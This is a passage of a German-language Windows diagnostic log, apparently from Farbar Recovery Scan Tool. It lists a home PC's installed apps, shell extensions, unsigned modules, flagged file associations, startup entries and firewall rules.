Microsoft Whiteboard -> C:\Program Files\WindowsApps\Microsoft.Whiteboard_53.21110.548.0_x64__8wekyb3d8bbwe [2024-03-07] (Microsoft Corporation) Microsoft.BingSearch -> C:\Program Files\WindowsApps\Microsoft.BingSearch_1.0.91.0_x64__8wekyb3d8bbwe [2024-03-20] (Microsoft Corporation) MicrosoftWindows.CrossDevice -> C:\Program Files\WindowsApps\MicrosoftWindows.CrossDevice_1.24062.51.0_x64__cw5n1h2txyewy [2024-07-19] (Microsoft Windows) [Startup Task] Minecraft for Windows -> C:\Program Files\WindowsApps\Microsoft.MinecraftUWP_1.21.202.0_x64__8wekyb3d8bbwe [2024-07-09] (Microsoft Studios) Minecraft Launcher -> C:\Program Files\WindowsApps\Microsoft.4297127D64EC6_1.7.2.0_x64__8wekyb3d8bbwe [2024-06-15] (Microsoft Studios) Minecraft Legends - Windows -> C:\Program Files\WindowsApps\Microsoft.BadgerWin10_1.18.19068.0_x64__8wekyb3d8bbwe [2024-06-15] (Microsoft Studios) Minecraft: Java Edition -> C:\Program Files\WindowsApps\Microsoft.MinecraftJavaEdition_1.0.5.0_x64__8wekyb3d8bbwe [2024-06-15] (Microsoft Studios) MSI Center -> C:\Program Files\WindowsApps\9426MICRO-STARINTERNATION.MSICenter_2.0.38.0_x64__kzh8wxbdkxb8p [2024-06-29] (MICRO-STAR INTERNATIONAL CO., LTD) [Startup Task] MSI Game Bar -> C:\Program Files\WindowsApps\9426MICRO-STARINTERNATION.MSIGameBar_2.0.15.0_x64__kzh8wxbdkxb8p [2024-02-07] (MICRO-STAR INTERNATIONAL CO., LTD) Netflix -> C:\Program Files\WindowsApps\4DF9E0F8.Netflix_6.99.5.0_x64__mcm4njqhnhss8 [2024-04-19] (Netflix, Inc.) Norton Security -> C:\Program Files\Norton Security\Engine\22.24.2.6 [2024-07-22] (NortonLifeLock Inc.) NVIDIA Control Panel -> C:\Program Files\WindowsApps\NVIDIACorp.NVIDIAControlPanel_8.1.966.0_x64__56jybvy8sckqj [2024-04-24] (NVIDIA Corp.) 
PowerToys FileLocksmith Context Menu -> C:\Program Files\PowerToys\WinUI3Apps [2024-06-09] (Microsoft) PowerToys ImageResizer Context Menu -> C:\Program Files\PowerToys [2024-06-09] (Microsoft) PowerToys PowerRename Context Menu -> C:\Program Files\PowerToys\WinUI3Apps [2024-06-09] (Microsoft) Python 3.11 -> C:\Program Files\WindowsApps\PythonSoftwareFoundation.Python.3.11_3.11.2544.0_x64__qbz5n2kfra8p0 [2024-04-03] (Python Software Foundation) Quizlet -> C:\Program Files\WindowsApps\QuizletInc.Quizlet_1.0.1.0_neutral__1kmnvb67sms8a [2024-07-14] (Quizlet, Inc.) Roblox -> C:\Program Files\WindowsApps\ROBLOXCORPORATION.ROBLOX_2.634.417.0_x64__55nm5eh3cm0pr [2024-07-19] (Roblox Corporation) Speech Pack - German (Germany) -> C:\Program Files\WindowsApps\MicrosoftWindows.Speech.de-DE.1_1.0.5.0_x64__cw5n1h2txyewy [2024-06-23] (Microsoft Windows) Spotify Music -> C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.242.290.0_x64__zpdnekdrzrea0 [2024-07-19] (Spotify AB) [Startup Task] Supraland: Six Inches Under -> C:\Program Files\WindowsApps\HumbleBundle.SupralandSixInchesUnder_1.0.29.0_x64__q2mcdwmzx4qja [2024-06-15] (Humble Bundle) WhatsApp -> C:\Program Files\WindowsApps\5319275A.WhatsAppDesktop_2.2428.8.0_x64__cv1g1gvanyjgm [2024-07-20] (WhatsApp Inc.) [Startup Task] WinAppRuntime.Main.1.5 -> C:\Program Files\WindowsApps\MicrosoftCorporationII.WinAppRuntime.Main.1.5_5001.178.1908.0_x64__8wekyb3d8bbwe [2024-07-10] (Microsoft Corp.) WinAppRuntime.Singleton -> C:\Program Files\WindowsApps\MicrosoftCorporationII.WinAppRuntime.Singleton_5001.178.1908.0_x64__8wekyb3d8bbwe [2024-07-10] (Microsoft Corp.) 
Windows Feature Experience Pack -> C:\Windows\SystemApps\MicrosoftWindows.Client.LKG_cw5n1h2txyewy [2024-07-12] (Microsoft Windows) Windows-Fotoanzeige -> C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2024.11070.15005.0_x64__8wekyb3d8bbwe [2024-07-19] (Microsoft Corporation) [Startup Task] WinRAR -> C:\Program Files\WinRAR [2023-09-13] (win.rar GmbH) ==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ============== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.) CustomCLSID: HKU\S-1-5-21-1221853621-2447620182-1933698513-1001_Classes\CLSID\{10144713-1526-46C9-88DA-1FB52807A9FF}\InprocServer32 -> C:\Program Files\PowerToys\PowerToys.SvgThumbnailProviderCpp.dll (Microsoft Corporation -> Microsoft Corporation) CustomCLSID: HKU\S-1-5-21-1221853621-2447620182-1933698513-1001_Classes\CLSID\{5ea9a442-5352-ed6e-d37f-9d511e7e2caa}\localserver32 -> C:\Program Files\PowerToys\PowerToys.PowerLauncher.exe (Microsoft Corporation -> Microsoft Corporation) CustomCLSID: HKU\S-1-5-21-1221853621-2447620182-1933698513-1001_Classes\CLSID\{60789D87-9C3C-44AF-B18C-3DE2C2820ED3}\InprocServer32 -> C:\Program Files\PowerToys\PowerToys.MarkdownPreviewHandlerCpp.dll (Microsoft Corporation -> Microsoft Corporation) CustomCLSID: HKU\S-1-5-21-1221853621-2447620182-1933698513-1001_Classes\CLSID\{729B72CD-B72E-4FE9-BCBF-E954B33FE699}\InprocServer32 -> C:\Program Files\PowerToys\PowerToys.QoiPreviewHandlerCpp.dll (Microsoft Corporation -> Microsoft Corporation) CustomCLSID: HKU\S-1-5-21-1221853621-2447620182-1933698513-1001_Classes\CLSID\{77257004-6F25-4521-B602-50ECC6EC62A6}\InprocServer32 -> C:\Program Files\PowerToys\PowerToys.StlThumbnailProviderCpp.dll (Microsoft Corporation -> Microsoft Corporation) CustomCLSID: HKU\S-1-5-21-1221853621-2447620182-1933698513-1001_Classes\CLSID\{A0257634-8812-4CE8-AF11-FA69ACAEAFAE}\InprocServer32 -> C:\Program 
Files\PowerToys\PowerToys.GcodePreviewHandlerCpp.dll (Microsoft Corporation -> Microsoft Corporation) CustomCLSID: HKU\S-1-5-21-1221853621-2447620182-1933698513-1001_Classes\CLSID\{AD856B15-D25E-4008-AFB7-AFAA55586188}\InprocServer32 -> C:\Program Files\PowerToys\PowerToys.QoiThumbnailProviderCpp.dll (Microsoft Corporation -> Microsoft Corporation) CustomCLSID: HKU\S-1-5-21-1221853621-2447620182-1933698513-1001_Classes\CLSID\{C4F0910E-E0B4-4E68-8086-452730C7A26A}\InprocServer32 -> C:\Users\skysc\AppData\Local\Autodesk\webdeploy\production\dabca83aceed67f5b8555a5b9697a3fc08792c77\NPreview10.dll (Autodesk, Inc. -> ) CustomCLSID: HKU\S-1-5-21-1221853621-2447620182-1933698513-1001_Classes\CLSID\{D8034CFA-F34B-41FE-AD45-62FCBB52A6DA}\InprocServer32 -> C:\Program Files\PowerToys\PowerToys.MonacoPreviewHandlerCpp.dll (Microsoft Corporation -> Microsoft Corporation) CustomCLSID: HKU\S-1-5-21-1221853621-2447620182-1933698513-1001_Classes\CLSID\{F2847CBE-CD03-4C83-A359-1A8052C1B9D5}\InprocServer32 -> C:\Program Files\PowerToys\PowerToys.GcodeThumbnailProviderCpp.dll (Microsoft Corporation -> Microsoft Corporation) CustomCLSID: HKU\S-1-5-21-1221853621-2447620182-1933698513-1001_Classes\CLSID\{FCDD4EED-41AA-492F-8A84-31A1546226E0}\InprocServer32 -> C:\Program Files\PowerToys\PowerToys.SvgPreviewHandlerCpp.dll (Microsoft Corporation -> Microsoft Corporation) ShellIconOverlayIdentifiers: [ OneDrive1] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => C:\Program Files\Microsoft OneDrive\24.132.0701.0002\FileSyncShell64.dll [2024-07-20] (Microsoft Corporation -> Microsoft Corporation) ShellIconOverlayIdentifiers: [ OneDrive2] -> {5AB7172C-9C11-405C-8DD5-AF20F3606282} => C:\Program Files\Microsoft OneDrive\24.132.0701.0002\FileSyncShell64.dll [2024-07-20] (Microsoft Corporation -> Microsoft Corporation) ShellIconOverlayIdentifiers: [ OneDrive3] -> {A78ED123-AB77-406B-9962-2A5D9D2F7F30} => C:\Program Files\Microsoft OneDrive\24.132.0701.0002\FileSyncShell64.dll [2024-07-20] (Microsoft 
Corporation -> Microsoft Corporation) ShellIconOverlayIdentifiers: [ OneDrive4] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => C:\Program Files\Microsoft OneDrive\24.132.0701.0002\FileSyncShell64.dll [2024-07-20] (Microsoft Corporation -> Microsoft Corporation) ShellIconOverlayIdentifiers: [ OneDrive5] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => C:\Program Files\Microsoft OneDrive\24.132.0701.0002\FileSyncShell64.dll [2024-07-20] (Microsoft Corporation -> Microsoft Corporation) ShellIconOverlayIdentifiers: [ OneDrive6] -> {9AA2F32D-362A-42D9-9328-24A483E2CCC3} => C:\Program Files\Microsoft OneDrive\24.132.0701.0002\FileSyncShell64.dll [2024-07-20] (Microsoft Corporation -> Microsoft Corporation) ShellIconOverlayIdentifiers: [ OneDrive7] -> {C5FF006E-2AE9-408C-B85B-2DFDD5449D9C} => C:\Program Files\Microsoft OneDrive\24.132.0701.0002\FileSyncShell64.dll [2024-07-20] (Microsoft Corporation -> Microsoft Corporation) ShellIconOverlayIdentifiers: [ OverlayExcluded] -> {4433A54A-1AC8-432F-90FC-85F045CF383C} => C:\Program Files\Norton Security\Engine\22.24.2.6\buShell.dll [2024-03-04] (NortonLifeLock Inc. -> Gen Digital Inc.) ShellIconOverlayIdentifiers: [ OverlayPending] -> {F17C0B1E-EF8E-4AD4-8E1B-7D7E8CB23225} => C:\Program Files\Norton Security\Engine\22.24.2.6\buShell.dll [2024-03-04] (NortonLifeLock Inc. -> Gen Digital Inc.) ShellIconOverlayIdentifiers: [ OverlayProtected] -> {476D0EA3-80F9-48B5-B70B-05E677C9C148} => C:\Program Files\Norton Security\Engine\22.24.2.6\buShell.dll [2024-03-04] (NortonLifeLock Inc. -> Gen Digital Inc.) 
ShellIconOverlayIdentifiers-x32: [ OneDrive1] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => C:\Program Files\Microsoft OneDrive\24.132.0701.0002\FileSyncShell64.dll [2024-07-20] (Microsoft Corporation -> Microsoft Corporation) ShellIconOverlayIdentifiers-x32: [ OneDrive2] -> {5AB7172C-9C11-405C-8DD5-AF20F3606282} => C:\Program Files\Microsoft OneDrive\24.132.0701.0002\FileSyncShell64.dll [2024-07-20] (Microsoft Corporation -> Microsoft Corporation) ShellIconOverlayIdentifiers-x32: [ OneDrive3] -> {A78ED123-AB77-406B-9962-2A5D9D2F7F30} => C:\Program Files\Microsoft OneDrive\24.132.0701.0002\FileSyncShell64.dll [2024-07-20] (Microsoft Corporation -> Microsoft Corporation) ShellIconOverlayIdentifiers-x32: [ OneDrive4] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => C:\Program Files\Microsoft OneDrive\24.132.0701.0002\FileSyncShell64.dll [2024-07-20] (Microsoft Corporation -> Microsoft Corporation) ShellIconOverlayIdentifiers-x32: [ OneDrive5] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => C:\Program Files\Microsoft OneDrive\24.132.0701.0002\FileSyncShell64.dll [2024-07-20] (Microsoft Corporation -> Microsoft Corporation) ShellIconOverlayIdentifiers-x32: [ OneDrive6] -> {9AA2F32D-362A-42D9-9328-24A483E2CCC3} => C:\Program Files\Microsoft OneDrive\24.132.0701.0002\FileSyncShell64.dll [2024-07-20] (Microsoft Corporation -> Microsoft Corporation) ShellIconOverlayIdentifiers-x32: [ OneDrive7] -> {C5FF006E-2AE9-408C-B85B-2DFDD5449D9C} => C:\Program Files\Microsoft OneDrive\24.132.0701.0002\FileSyncShell64.dll [2024-07-20] (Microsoft Corporation -> Microsoft Corporation) ShellIconOverlayIdentifiers-x32: [ OverlayExcluded] -> {4433A54A-1AC8-432F-90FC-85F045CF383C} => C:\Program Files\Norton Security\Engine\22.24.2.6\buShell.dll [2024-03-04] (NortonLifeLock Inc. -> Gen Digital Inc.) ShellIconOverlayIdentifiers-x32: [ OverlayPending] -> {F17C0B1E-EF8E-4AD4-8E1B-7D7E8CB23225} => C:\Program Files\Norton Security\Engine\22.24.2.6\buShell.dll [2024-03-04] (NortonLifeLock Inc. 
-> Gen Digital Inc.) ShellIconOverlayIdentifiers-x32: [ OverlayProtected] -> {476D0EA3-80F9-48B5-B70B-05E677C9C148} => C:\Program Files\Norton Security\Engine\22.24.2.6\buShell.dll [2024-03-04] (NortonLifeLock Inc. -> Gen Digital Inc.) ContextMenuHandlers1: [ FileSyncEx] -> {CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B} => C:\Program Files\Microsoft OneDrive\24.132.0701.0002\FileSyncShell64.dll [2024-07-20] (Microsoft Corporation -> Microsoft Corporation) ContextMenuHandlers1: [BUContextMenu] -> {F7CAA2A1-67A2-44BB-B20F-202FD8EB1DAB} => C:\Program Files\Norton Security\Engine\22.24.2.6\buShell.dll [2024-03-04] (NortonLifeLock Inc. -> Gen Digital Inc.) ContextMenuHandlers1: [NortonLifeLock.Norton.Antivirus.IEContextMenu] -> {FAD61B3D-699D-49B2-BE16-7F82CB4C59CA} => C:\Program Files\Norton Security\Engine\22.24.2.6\NavShExt.dll [2024-03-04] (NortonLifeLock Inc. -> Gen Digital Inc.) ContextMenuHandlers2: [FileLocksmithExt] -> {84D68575-E186-46AD-B0CB-BAEB45EE29C0} => C:\Program Files\PowerToys\WinUI3Apps\PowerToys.FileLocksmithExt.dll [2024-05-26] (Microsoft Corporation -> Microsoft Corporation) ContextMenuHandlers2: [NortonLifeLock.Norton.Antivirus.IEContextMenu] -> {FAD61B3D-699D-49B2-BE16-7F82CB4C59CA} => C:\Program Files\Norton Security\Engine\22.24.2.6\NavShExt.dll [2024-03-04] (NortonLifeLock Inc. -> Gen Digital Inc.) ContextMenuHandlers3: [FileLocksmithExt] -> {84D68575-E186-46AD-B0CB-BAEB45EE29C0} => C:\Program Files\PowerToys\WinUI3Apps\PowerToys.FileLocksmithExt.dll [2024-05-26] (Microsoft Corporation -> Microsoft Corporation) ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2024-06-04] (Malwarebytes Inc. 
-> Malwarebytes) ContextMenuHandlers3: [PowerRenameExt] -> {0440049F-D1DC-4E46-B27B-98393D79486B} => C:\Program Files\PowerToys\WinUI3Apps\PowerToys.PowerRenameExt.dll [2024-05-26] (Microsoft Corporation -> Microsoft Corporation) ContextMenuHandlers4: [ FileSyncEx] -> {CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B} => C:\Program Files\Microsoft OneDrive\24.132.0701.0002\FileSyncShell64.dll [2024-07-20] (Microsoft Corporation -> Microsoft Corporation) ContextMenuHandlers5: [ FileSyncEx] -> {CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B} => C:\Program Files\Microsoft OneDrive\24.132.0701.0002\FileSyncShell64.dll [2024-07-20] (Microsoft Corporation -> Microsoft Corporation) ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\Windows\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_493585427225c794\nvshext.dll [2024-02-08] (NVIDIA Corporation -> NVIDIA Corporation) ContextMenuHandlers5: [PowerRenameExt] -> {0440049F-D1DC-4E46-B27B-98393D79486B} => C:\Program Files\PowerToys\WinUI3Apps\PowerToys.PowerRenameExt.dll [2024-05-26] (Microsoft Corporation -> Microsoft Corporation) ContextMenuHandlers6: [BUContextMenu] -> {F7CAA2A1-67A2-44BB-B20F-202FD8EB1DAB} => C:\Program Files\Norton Security\Engine\22.24.2.6\buShell.dll [2024-03-04] (NortonLifeLock Inc. -> Gen Digital Inc.) ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2024-06-04] (Malwarebytes Inc. -> Malwarebytes) ContextMenuHandlers6: [NortonLifeLock.Norton.Antivirus.IEContextMenu] -> {FAD61B3D-699D-49B2-BE16-7F82CB4C59CA} => C:\Program Files\Norton Security\Engine\22.24.2.6\NavShExt.dll [2024-03-04] (NortonLifeLock Inc. -> Gen Digital Inc.) ==================== Codecs (Nicht auf der Ausnahmeliste) ==================== ==================== Verknüpfungen & WMI ======================== (Die Einträge können gelistet werden, um sie zurückzusetzen oder zu entfernen.) 
ShortcutWithArgument: C:\Users\skysc\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\188f5ec9d11ded56\Persönlich 2 - Edge.lnk -> C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (Microsoft Corporation) -> --profile-directory="Profile 1"

==================== Geladene Module (Nicht auf der Ausnahmeliste) =============

2024-07-22 16:12 - 2024-07-22 16:12 - 000111616 _____ () [Datei ist nicht signiert] \\?\C:\Users\skysc\AppData\Local\Temp\57e9083c-d5b9-477e-8644-249fa3ec6254.tmp.node
2024-07-22 16:12 - 2024-07-22 16:12 - 000270336 _____ () [Datei ist nicht signiert] \\?\C:\Users\skysc\AppData\Local\Temp\eb53eb96-7ca0-40e9-bfe6-bdf167c5a362.tmp.node
2024-07-22 15:43 - 2024-07-22 15:43 - 002877440 _____ () [Datei ist nicht signiert] C:\Users\skysc\AppData\Local\Programs\launcher\ffmpeg.dll
2024-07-22 15:43 - 2024-07-22 15:43 - 000478208 _____ () [Datei ist nicht signiert] C:\Users\skysc\AppData\Local\Programs\launcher\libegl.dll
2024-07-22 15:43 - 2024-07-22 15:43 - 007808512 _____ () [Datei ist nicht signiert] C:\Users\skysc\AppData\Local\Programs\launcher\libglesv2.dll
2024-07-22 15:43 - 2024-07-22 15:43 - 005238784 _____ () [Datei ist nicht signiert] C:\Users\skysc\AppData\Local\Programs\launcher\vk_swiftshader.dll

==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird nur der ADS entfernt.)

AlternateDataStreams: C:\Users\Public\Shared Files:VersionCache [3952]

==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ==================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"

==================== Verknüpfungen (Nicht auf der Ausnahmeliste) =================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt.)

HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\Software\Classes\regfile: <==== ACHTUNG
HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\Software\Classes\.reg: => <==== ACHTUNG
HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\Software\Classes\.bat: => <==== ACHTUNG
HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\Software\Classes\.cmd: => <==== ACHTUNG

==================== Internet Explorer (Nicht auf der Ausnahmeliste) ==========

HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://localoem.msn.com/?pc=SBJB
HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://localoem.msn.com/?pc=SBJB
HKU\S-1-5-21-1221853621-2447620182-1933698513-1002\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://localoem.msn.com/?pc=SBJB
HKU\S-1-5-21-1221853621-2447620182-1933698513-1002\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://localoem.msn.com/?pc=SBJB
SearchScopes: HKU\S-1-5-21-1221853621-2447620182-1933698513-1001 -> DefaultScope {748F61FA-2044-4035-AAD3-7322004BAF23} URL =
SearchScopes: HKU\S-1-5-21-1221853621-2447620182-1933698513-1001 -> {748F61FA-2044-4035-AAD3-7322004BAF23} URL =
BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\OCHelper.dll [2022-06-22] (Microsoft Corporation -> Microsoft Corporation)
Toolbar: HKLM-x32 - Kein Name - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - Keine Datei
Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2022-06-22] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2022-06-22] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2022-06-22] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2022-06-22] (Microsoft Corporation -> Microsoft Corporation)

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.)

IE trusted site: HKU\.DEFAULT\...\adaware.com -> hxxp://adaware.com
IE trusted site: HKU\.DEFAULT\...\localhost -> localhost
IE trusted site: HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\...\localhost -> localhost

==================== Hosts Inhalt: =========================

(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)

2022-05-07 07:24 - 2024-07-20 14:39 - 000000824 _____ C:\Windows\system32\drivers\etc\hosts

==================== Andere Bereiche ===========================

(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)

HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\skysc\AppData\Local\Microsoft\Windows\Themes\green\DesktopBackground\design ohne titel.jpg
HKU\S-1-5-21-1221853621-2447620182-1933698513-1002\Control Panel\Desktop\\Wallpaper -> C:\Windows\web\wallpaper\Windows\img0.jpg
DNS Servers: 192.168.2.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1) ist aktiviert.

Network Binding:
=============
Ethernet: Realtek PCIe GbE Family Controller -> rt68cx21x64.sys netvsc_vfpp: Microsoft NetVsc Failover VF Protocol

==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)

HKLM\...\StartupApproved\Run: => "RtkAudUService"
HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\...\StartupApproved\StartupFolder: => "SearchEngineOptimizer.lnk"
HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\...\StartupApproved\Run: => "MicrosoftEdgeAutoLaunch_E457065EC9FFC031D52374F8B9832F00"
HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\...\StartupApproved\Run: => "Opera GX Stable"
HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\...\StartupApproved\Run: => "Opera GX Browser Assistant"
HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\...\StartupApproved\Run: => "Discord"
HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\...\StartupApproved\Run: => "SUPERAntiSpyware"

==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

FirewallRules: [{79DB3BD0-3A79-4448-9EB3-730B8B161F78}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\outlook.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{778F0263-8CF1-47F6-B82F-9B196556BB03}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (NVIDIA Corporation -> NVIDIA Corporation)
FirewallRules: [{A1375D8B-211F-46FD-BF4A-ACF3BC888C71}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (NVIDIA Corporation -> NVIDIA Corporation)
FirewallRules: [{9DA7C74D-C4E5-4E61-9B05-C677F08101AE}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe (Valve Corp. -> Valve Corporation)
FirewallRules: [{CCF3D3EA-C12E-4397-A81B-A8D8F1B52E5E}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe (Valve Corp. -> Valve Corporation)
FirewallRules: [{9F9F357C-17F5-47D7-A92D-535EEA36F817}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe (Valve Corp. -> Valve Corporation)
FirewallRules: [{5421962D-D93D-4A38-B8E0-AF3D5B012B70}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe (Valve Corp. -> Valve Corporation)
FirewallRules: [{31F431BD-FA45-4EB5-857D-B92DDDD55C7E}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\PortalRTX\hl2.exe () [Datei ist nicht signiert]
FirewallRules: [{4F47432D-BFE5-4B0D-BC3D-50AC5D2155E1}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\PortalRTX\hl2.exe () [Datei ist nicht signiert]
FirewallRules: [{849421B3-DBB9-42F3-AC3F-559BF23BF169}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\3DMark\bin\x64\3DMark.exe (Underwriters Laboratories Inc. -> )
FirewallRules: [{AC2A4BA7-A657-4AE3-8168-FF06531440F5}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\3DMark\bin\x64\3DMark.exe (Underwriters Laboratories Inc. -> )
FirewallRules: [TCP Query User{433BCD88-C4B2-4EF5-A15C-DE87B1EFEC9D}C:\users\skysc\appdata\local\programs\opera gx\opera.exe] => (Allow) C:\users\skysc\appdata\local\programs\opera gx\opera.exe (Opera Norway AS -> Opera Software)
FirewallRules: [UDP Query User{A64C0A77-F5DE-437F-9A08-F4D6C7CE1526}C:\users\skysc\appdata\local\programs\opera gx\opera.exe] => (Allow) C:\users\skysc\appdata\local\programs\opera gx\opera.exe (Opera Norway AS -> Opera Software)
FirewallRules: [{6C1DFBDC-CBC2-4532-BA81-61428BAD9E32}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{9D0B8760-8B4F-48C0-B584-1EDE76067744}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{54B682FF-D75A-43BC-8621-35B131EEC47D}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.) FirewallRules: [{37DE760A-966C-4CEF-A94E-943B067E2C38}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.) FirewallRules: [{DB802AC9-3200-4942-8A66-9E21653D6877}] => (Allow) C:\Users\skysc\Downloads\reiboot.exe => Keine Datei FirewallRules: [{673CA5C5-087F-4D3C-A551-7B55882DD6C4}] => (Allow) C:\Users\skysc\Downloads\reiboot.exe => Keine Datei FirewallRules: [{9A64A019-644F-406D-A589-4309A5CB1597}] => (Allow) C:\program files (x86)\wondershare\wondershare dr.fone basic - deutsch\drfonetoolkit.exe => Keine Datei FirewallRules: [{BCB306CA-E1A4-40C1-8EB4-81578EF309AD}] => (Allow) C:\Users\skysc\Downloads\iphone-unlock.exe => Keine Datei FirewallRules: [{85C84592-4891-403F-9F3A-956B0298089D}] => (Allow) C:\Users\skysc\Downloads\iphone-unlock.exe => Keine Datei FirewallRules: [{ED6838B8-72BA-41FE-BF1C-D1A5390DEEBA}] => (Allow) C:\Users\skysc\Downloads\4ukey.exe => Keine Datei FirewallRules: [{728CC1FC-9D1C-4247-8088-91A054283042}] => (Allow) C:\Users\skysc\Downloads\4ukey.exe => Keine Datei FirewallRules: [{E1E74D51-2416-4DA4-BD94-D5FBBA9F7BF2}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Aim Lab\AimLab_tb.exe () [Datei ist nicht signiert] FirewallRules: [{169827A1-12F0-4DE6-80EE-9EEFF1942860}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Aim Lab\AimLab_tb.exe () [Datei ist nicht signiert] FirewallRules: [{FFEFCEA8-51C9-4CDB-95FE-87CD64865405}] => (Allow) C:\Program Files\Samsung\Easy Connection to Screen\Service.exe (Samsung Electronics CO., LTD. 
